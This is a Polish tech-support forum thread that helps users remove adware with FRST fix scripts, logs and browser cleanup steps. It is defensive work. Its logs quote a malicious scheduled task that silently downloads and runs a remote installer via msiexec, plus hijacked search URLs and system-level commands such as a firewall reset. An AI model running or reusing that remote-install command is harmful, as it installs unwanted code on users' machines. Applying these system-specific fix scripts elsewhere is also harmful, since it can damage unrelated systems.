ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) GroupPolicy: Ograniczenia GroupPolicyScripts: Ograniczenia HKU\S-1-5-21-1068828578-3051605171-1808777383-1001\...\Run: [AMDDVR] => "C:\Program Files\AMD\CNext\CNext\amddvr.exe" HKU\S-1-5-21-1068828578-3051605171-1808777383-1001\...\Run: [AceStream] => C:\Users\Gibon\AppData\Roaming\ACEStream\engine\ace_engine.exe SearchScopes: HKU\S-1-5-21-1068828578-3051605171-1808777383-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = IE trusted site: HKU\S-1-5-21-1068828578-3051605171-1808777383-1001\...\hola.org -> hxxp://hola.org CHR HomePage: Default -> hxxps://www.google.com/?trackid=sp-006 CHR StartupUrls: Default -> "hxxps://www.google.com/?trackid=sp-006" DeleteKey: HKCU\Software\Google\Chrome\Extensions DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\_acestream_cache_ C:\ProgramData\23134L12724y42610N90718 C:\ProgramData\24706L95268y64492N99499 C:\ProgramData\70954L64362y73548N59425 C:\ProgramData\Kaspersky Lab Setup Files C:\ProgramData\SoftwareUpdateTemp.xml EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. W Google Chrome: Ustawienia > karta Rozszerzenia > odinstaluj Video Downloader professional. To niezaufane rozszerzenie, powiązane z aktywnością adware. 3. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt. Na Pulpicie powstał też plik cert.reg, shostuj go gdzieś i podaj link do tego pliku.

Jeśli nadal potrzebujesz pomocy, zajmę się tym tematem teraz. Proszę potwierdź czy to nadal aktualne. Jeśli tak, nowe raporty FRST są potrzebne.

Forum zostało przekierowane na bezpieczny https://www.fixitpc.pl/. Od teraz w przeglądarkach główne strony forum są identyfikowane ikoną kłódki. Jednak na niektórych pod-stronach forum (w określonych tematach) może się pokazać komunikat o "mieszanej zawartości" ze względu na linki do obrazów ze źródeł adresowanych via http. - Linki do fixitpc.pl zostaną podmienione hurtem w bazie danych w późniejszym terminie. Zrobione. - Linki do zewnętrznych źródeł (np. serwisów hostujących obrazy) niestety pozostaną, jeżeli dany serwis nie obsługuje https.

Adware wprowadziło blokadę programów zabezpieczających w oparciu o funkcję Niezaufanych certyfikatów, dlatego nie da się uruchomić m.in. AdwCleaner (blokada certyfikatu Malwarebytes). Poza tym są tu fałszywe przeglądarki "Chrome" i "Firefox" i masa innych śmieci. Działania do przeprowadzenia: 1. Przez Panel sterowania odinstaluj niepożądany program YAC(Yet Another Cleaner!). 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 7D7F4414CCEF168ADF6BF40753B5BECD78375931 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Avast Antivirus/Software) HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Avast Antivirus/Software) HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1 HKU\S-1-5-21-489643024-731826354-959299013-1000\...\Run: [GalaxyClient] => [X] HKU\S-1-5-21-489643024-731826354-959299013-1000\...\Run: [background_fault] => C:\Users\Lambert\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-27] (AVAST Software) HKLM\...\Providers\1ol3sxub: C:\Program Files (x86)\Clihotain Configuration\local64spl.dll IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe ShellExecuteHooks: Brak nazwy - {6A69B0BA-392B-11E7-B267-64006A5CFC23} - C:\Users\Lambert\AppData\Roaming\Prageghtthasuy\Cohispphokisy.dll [145408 2017-05-20] () ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku WMI_ActiveScriptEventConsumer_ASEC: CHR HomePage: Default -> hxxp://www.luckysearch123.com?type=hp&ts=1495813616&from=ca9a0525&uid=wdcxwd1200js-00mhb0_wd-wcann104216642166&z=7e527a4ccae801a9a9a6823gbz6tcw5b4gdccoceag CHR StartupUrls: Default -> "hxxp://www.luckysearch123.com?type=hp&ts=1495813616&from=ca9a0525&uid=wdcxwd1200js-00mhb0_wd-wcann104216642166&z=7e527a4ccae801a9a9a6823gbz6tcw5b4gdccoceag" HKU\S-1-5-21-489643024-731826354-959299013-1000\...\ChromeHTML: -> C:\Program Files (x86)\Hippig\Application\chrome.exe (Google Inc.) HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495817398&z=539fb33b098d581863e9993g4z3tcw5b0g1q1t5bbg&from=che0812&uid=WDCXWD1200JS-00MHB0_WD-WCANN104216642166&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495817398&z=539fb33b098d581863e9993g4z3tcw5b0g1q1t5bbg&from=che0812&uid=WDCXWD1200JS-00MHB0_WD-WCANN104216642166&q={searchTerms} HKU\S-1-5-21-489643024-731826354-959299013-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www-searching.com/?pid=s&s=H5Kzbcnbl1BU,6a532031-42f4-47fc-916e-b7d6d8da77f6,&vp=ch&prd=set_ie SearchScopes: HKU\S-1-5-21-489643024-731826354-959299013-1000 -> {9A91F84A-3E08-4774-B825-7A6604704214} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=H5Kzbcnbl1BU,6a532031-42f4-47fc-916e-b7d6d8da77f6, ShortcutWithArgument: C:\Users\Lambert\Desktop\Gówno\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www-searching.com/?prd=set_epf&s=h5kzbcnbl1bu,6a532031-42f4-47fc-916e-b7d6d8da77f6, ShortcutWithArgument: C:\Users\Lambert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1495817398&z=539fb33b098d581863e9993g4z3tcw5b0g1q1t5bbg&from=che0812&uid=WDCXWD1200JS-00MHB0_WD-WCANN104216642166 R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-06-01] (TODO: ) [brak podpisu cyfrowego] S2 DsSvc; C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp [84 2017-05-25] () [brak podpisu cyfrowego] R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [98456 2017-05-25] () S2 glory; C:\Users\Lambert\AppData\Local\glory\glory.dll [909824 2017-06-01] (glory) [brak podpisu cyfrowego] R2 WinSAPSvc; C:\Users\Lambert\AppData\Roaming\WinSAPSvc\WinSAP.dll [1886720 2017-06-01] () [brak podpisu cyfrowego] U3 aswbdisk; Brak ImagePath U2 snare; Brak ImagePath S4 sptd; \SystemRoot\System32\Drivers\sptd.sys [X] U2 terana; Brak ImagePath S3 VGPU; System32\drivers\rdvgkmd.sys [X] S3 xhunter1; \??\C:\Windows\xhunter1.sys [X] Task: {032BAD74-97C2-43DE-B45B-88930DDF692F} - System32\Tasks\{D7AFBC4C-4474-49BE-80F6-F744826C4525} => C:\Program Files (x86)\Diablo II\Diablo II.exe Task: {2F04D6BD-444A-40B0-9AAF-7E16B78A5008} - System32\Tasks\{C3660774-1430-4C6F-8E8D-021096A1846D} => C:\Users\Lambert\Desktop\adwcleaner_6.040.exe [2016-12-03] () Task: {494E40C4-7065-4724-A0CD-372B912DCB61} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-06-01] () Task: {55CA615F-492D-4305-B18F-FC520019D725} - System32\Tasks\{C5C828EA-3D5C-4845-B204-7FE4C2AE81FA} => pcalua.exe -a "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17\ModdingWayInstaller.exe" -d "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17" Task: {93CDB1CB-5A6C-4B17-925E-CA176B66A3E4} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe Task: {CB1675FB-1CFE-4EA8-B420-931065D8D9E8} - System32\Tasks\Keyboard Checksum Verifier => Rundll32.exe "C:\Program Files\Keyboard Checksum Verifier\Keyboard Checksum Verifier.dll",xVbAXgKyh Task: {CB4D2BD4-C91B-46A3-ACDC-B7BAFFF58620} - System32\Tasks\Arujogh Cloud => C:\Program Files (x86)\Walchshjit\yaupdcache.exe Task: {DB4CEECD-3E4F-4CF8-90E1-AC0086D93F9C} - System32\Tasks\IBUpd2 => C:\Users\Lambert\AppData\Local\BrowserAir\48.0.0.0\updater.exe Task: {E5191DB7-0019-441E-A4BD-7057B820C5F5} - System32\Tasks\Clihotain Configuration => C:\Program Files (x86)\Walchshjit\ficult.exe Task: {E81B7F83-F695-4905-BD35-AAD17C8649AE} - System32\Tasks\Microsoft\Windows\DeviceSettings\Thupetherbeqerph => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=WDCXWD1200JS-00MHB0_WD-WCANN104216642166&d=20170520 /q Task: {E976FE0B-314A-4A6F-AF68-E8A931C88CFB} - System32\Tasks\Trojan Remover => C:\Program Files\Loaris Trojan Remover\ltr.exe Task: {FA76DE69-D3A4-481C-BF44-2C2DC557314C} - System32\Tasks\SMW_UpdateTask_Time_3835313734393736322d2355786c325a5b5734412d34 => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 Task: {FE9FF048-6797-4E07-AA29-BBDCC273E036} - System32\Tasks\{F688C87D-DD38-4E0F-9D49-BFF7ECC53E4D} => pcalua.exe -a "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17\ModdingWayInstaller.exe" -d "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17" DeleteKey: HKCU\Software\Google\Chrome\Extensions DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox\Extensions DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins CMD: netsh advfirewall reset C:\$AV_ASW C:\Cosusp C:\Pipisy C:\Program Files\1ol3sxub C:\Program Files\AVAST Software C:\Program Files\Keyboard Checksum Verifier C:\Program Files\MK C:\Program Files\Common Files\509E0 C:\Program Files\Common Files\Noobzo C:\Program Files (x86)\Clihotain Configuration C:\Program Files (x86)\Firefox C:\Program Files (x86)\Hippig C:\Program Files (x86)\MIO C:\Program Files (x86)\Walchshjit C:\ProgramData\log.binb C:\ProgramData\log.ewbb C:\ProgramData\log.ewbt C:\ProgramData\.mono C:\ProgramData\AVAST Software C:\ProgramData\BIT C:\ProgramData\Loaris C:\ProgramData\SearchModule C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Max Payne-ROKA1969.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Diablo II C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kolekcja Klasyki C:\ProgramData\Microsoft\Windows\Start Menu\Programs\San Andreas Multiplayer C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TP-LINK C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YeaDesktop C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0} C:\Stuvatybugtain C:\Users\Lambert\AppData\Local\{CDB39C7B-51CB-4A3E-BDF9-8D90DE43D449} C:\Users\Lambert\AppData\Local\AdvinstAnalytics C:\Users\Lambert\AppData\Local\background_fault C:\Users\Lambert\AppData\Local\BrowserAir C:\Users\Lambert\AppData\Local\Firefox C:\Users\Lambert\AppData\Local\glory C:\Users\Lambert\AppData\Local\Hippig C:\Users\Lambert\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk C:\Users\Lambert\AppData\Local\Phoceshgrherry C:\Users\Lambert\AppData\Local\snare C:\Users\Lambert\AppData\Local\terana C:\Users\Lambert\AppData\Local\THQ C:\Users\Lambert\AppData\Roaming\AVAST Software C:\Users\Lambert\AppData\Roaming\DAEMON Tools Lite C:\Users\Lambert\AppData\Roaming\Event Monitor C:\Users\Lambert\AppData\Roaming\Firefox C:\Users\Lambert\AppData\Roaming\Google C:\Users\Lambert\AppData\Roaming\Microleaves C:\Users\Lambert\AppData\Roaming\Mozilla\Firefox\naweriweentcofise C:\Users\Lambert\AppData\Roaming\Prageghtthasuy C:\Users\Lambert\AppData\Roaming\Showuk C:\Users\Lambert\AppData\Roaming\UCChannel C:\Users\Lambert\AppData\Roaming\WinSAPSvc C:\Users\Lambert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome (2).lnk C:\Users\Lambert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\Lambert\Desktop\AdwCleaner Portable AdwCleaner 5.019 PL C:\Users\Lambert\Desktop\Gówno\Battlefield 1942.lnk C:\Users\Lambert\Desktop\Gówno\Counter-Strike Source.lnk C:\Users\Lambert\Desktop\Gówno\DAEMON Tools Lite.lnk C:\Users\Lambert\Desktop\Gówno\Diablo III.lnk C:\Users\Lambert\Desktop\Gówno\Grand Theft Auto Vice City.lnk C:\Users\Lambert\Desktop\Gówno\GTA Vice City.lnk C:\Users\Lambert\Desktop\Gówno\MassEffectConfig.lnk C:\Users\Lambert\Desktop\Gówno\Quick Server.lnk C:\Users\Lambert\Desktop\Gówno\San Andreas Multiplayer.lnk C:\Users\Lambert\Desktop\Gówno\Skype.lnk C:\Users\Lambert\Desktop\Gówno\Spartan.lnk C:\Users\Lambert\Downloads\AdwCleaner*.exe C:\Users\Lambert\Downloads\Emsisoft*.exe C:\Users\Lambert\Downloads\Loaris*.exe C:\Users\Lambert\Downloads\Malwarebytes*.exe C:\Users\Lambert\Downloads\ReimageRepair.exe C:\Users\Public\Desktop\Google Chrome.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\Public\Documents\report.dat C:\Users\Public\Documents\temp.dat C:\Windows\Reimage.ini C:\Windows\csrss.exe C:\Windows\taskmgr.exe C:\Windows\Azart C:\Windows\system32\Drivers\*.tmp C:\Windows\system32\log Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zostały usunięte skróty do fałszywych przeglądarek, więc zrób ręcznie skróty do prawdziwych. Ustaw wybraną przeglądarkę jako domyślna. Następnie po kolei wyczyść przeglądarki z adware: Firefox: Wyeksportuj zakładki, o ile jest co eksportować. Zamknij Firefox i wywołaj menedżer profilów poprzez klawisz z flagą Windows + R i wklejenie poniższej komendy w polu Uruchom i OK. W menedżerze usuń wszystkie widoczne profile i załóż nowy, zaloguj się na niego. "C:\Program files (x86)\Mozilla Firefox\firefox.exe" -p Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj Unlimited Free VPN - Hola. To niepożądane rozszerzenie, powiązane z aktywnością para-botnet Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą). 4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt.

ExecTI Strona domowa Platforma: Windows 7 i nowsze 32-bit i 64-bit Licencja: freeware Miniaturowa aplikacja do uruchamiania plików wykonywalnych (exe, cmd, bat) na uprawnieniu TrustedInstaller. Interfejs zgrzebny, brak dodatkowych dialogów i opcji. Operacja ogranicza się do wyboru pliku wykonywalnego via przycisk "Browse..." lub poprzez bezpośrednie wpisanie komendy w polu tekstowym. Obsługiwane wprowadzanie poleceń z argumentami. Np. wpisując regedit.exe -m uruchomimy nową instancję edytora rejestru. W pliku ExecTI.ini są zapamiętywane ostatnio używane ścieżki.

Jest tu kilka uszkodzeń: 1. Po pierwsze, masa plików Microsoftu nie ma podpisu cyfrowego, w tym pliki powiązane z działaniem sieci: ==================== Bamital & volsnap ====================== C:\WINDOWS\system32\services.exe [2008-04-15 14:00] - [2009-02-09 13:25] - 0111104 _____ (Microsoft Corporation) 02A467E27AF55F7064C5B251E587315F C:\WINDOWS\system32\rpcss.dll [2008-04-15 14:00] - [2009-02-09 12:53] - 0401408 _____ (Microsoft Corporation) A37311D9D628C1042A2836731787F0F3 C:\WINDOWS\system32\dnsapi.dll [2008-04-15 14:00] - [2011-03-03 08:55] - 0149504 _____ (Microsoft Corporation) 6599CFCB40329C37282E4E80E813E799 ==================== Usługi (filtrowane) ==================== S4 Browser; C:\WINDOWS\System32\browser.dll [78336 2012-07-06] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 DcomLaunch; C:\WINDOWS\system32\rpcss.dll [401408 2009-02-09] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 Dnscache; C:\WINDOWS\System32\dnsrslvr.dll [45568 2009-04-20] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 Eventlog; C:\WINDOWS\system32\services.exe [111104 2009-02-09] (Microsoft Corporation) [Brak podpisu cyfrowego] R3 EventSystem; C:\WINDOWS\system32\es.dll [253952 2008-07-07] (Microsoft Corporation) [Brak podpisu cyfrowego] R3 FastUserSwitchingCompatibility; C:\WINDOWS\System32\shsvcs.dll [135680 2009-07-28] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 LanmanServer; C:\WINDOWS\System32\srvsvc.dll [99840 2010-08-27] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 lanmanworkstation; C:\WINDOWS\System32\wkssvc.dll [132096 2009-06-10] (Microsoft Corporation) [Brak podpisu cyfrowego] R3 Nla; C:\WINDOWS\System32\mswsock.dll [246784 2008-06-20] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 PlugPlay; C:\WINDOWS\system32\services.exe [111104 2009-02-09] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 RpcSs; C:\WINDOWS\system32\rpcss.dll [401408 2009-02-09] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 ShellHWDetection; C:\WINDOWS\System32\shsvcs.dll [135680 2009-07-28] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 Spooler; C:\WINDOWS\system32\spoolsv.exe [58880 2010-08-17] (Microsoft Corporation) [Brak podpisu cyfrowego] R2 Themes; C:\WINDOWS\System32\shsvcs.dll [135680 2009-07-28] (Microsoft Corporation) [Brak podpisu cyfrowego] ===================== Sterowniki (filtrowane) ====================== R1 AFD; C:\WINDOWS\System32\drivers\afd.sys [138496 2011-08-17] (Microsoft Corporation) [Brak podpisu cyfrowego] S3 HTTP; C:\WINDOWS\System32\Drivers\HTTP.sys [265728 2009-10-20] (Microsoft Corporation) [Brak podpisu cyfrowego] S3 hwusbapp; C:\WINDOWS\System32\DRIVERS\ewusbapp.sys [65152 2006-05-31] (QUALCOMM Incorporated) [Brak podpisu cyfrowego] S3 hwusbser; C:\WINDOWS\System32\DRIVERS\ewusbser.sys [65152 2006-05-31] (QUALCOMM Incorporated) [Brak podpisu cyfrowego] R0 KSecDD; C:\WINDOWS\system32\Drivers\KSecDD.sys [92928 2009-06-24] (Microsoft Corporation) [Brak podpisu cyfrowego] R1 MRxSmb; C:\WINDOWS\System32\DRIVERS\mrxsmb.sys [456320 2011-07-15] (Microsoft Corporation) [Brak podpisu cyfrowego] R0 Mup; C:\WINDOWS\system32\Drivers\Mup.sys [105472 2011-04-21] (Microsoft Corporation) [Brak podpisu cyfrowego] R3 NdisTapi; C:\WINDOWS\System32\DRIVERS\ndistapi.sys [10496 2011-07-08] (Microsoft Corporation) [Brak podpisu cyfrowego] R3 NDProxy; C:\WINDOWS\system32\Drivers\NDProxy.sys [40960 2013-11-27] (Microsoft Corporation) [Brak podpisu cyfrowego] R3 Srv; C:\WINDOWS\System32\DRIVERS\srv.sys [357888 2011-02-17] (Microsoft Corporation) [Brak podpisu cyfrowego] R1 Tcpip; C:\WINDOWS\System32\DRIVERS\tcpip.sys [361600 2008-06-20] (Microsoft Corporation) [Brak podpisu cyfrowego] S3 UIUSys; C:\WINDOWS\System32\DRIVERS\UIUSYS.SYS [6909 2006-06-09] (Conexant Systems, Inc) [Brak podpisu cyfrowego] S3 usbccgp; C:\WINDOWS\System32\DRIVERS\usbccgp.sys [32384 2013-08-09] (Microsoft Corporation) [Brak podpisu cyfrowego] R3 usbehci; C:\WINDOWS\System32\DRIVERS\usbehci.sys [30336 2009-03-18] (Microsoft Corporation) [Brak podpisu cyfrowego] S3 usbscan; C:\WINDOWS\System32\DRIVERS\usbscan.sys [14976 2013-07-03] (Microsoft Corporation) [Brak podpisu cyfrowego] S3 usb_rndisx; C:\WINDOWS\System32\DRIVERS\usb8023x.sys [12928 2013-02-12] (Microsoft Corporation) [Brak podpisu cyfrowego] Ten odczyt może oznaczać uszkodzenie plików lub uszkodzenie bazy podpisów cyfrowych (Catroot lub Catroot2). 2. Po drugie, uszkodzony Winsock (brak pliku Bytemobile). Winsock: Catalog9 01 bmnet.dll => Brak pliku Winsock: Catalog9 02 bmnet.dll => Brak pliku Winsock: Catalog9 03 bmnet.dll => Brak pliku Wpisy mogą być nadal pomimo resetu Winsock ponieważ procesy Bytemobile są aktywne i mogą przywracać te wejścia. O ile Winsock można próbować reperować poprzez przeinstalowanie Bytemobile, to większy problem jest tu z plikami Microsoftu. Przy założeniu, że to pliki per se są uszkodzone a nie Catroot2, naprawa ręczna zdaje się tu być nieopłacalna - musi być uruchomiony ogólny system sprawdzania i podstawiania plików MS, czyli albo sfc /scannow (na XP jest to słaby system) albo reperacja nakładkowa systemu. Za bazę naprawczą muszą być wzięte pliki z SP3, by zachować podstawową zgodność. Te procesy i tak wyzerują aktualizacje nowsze niż SP3.

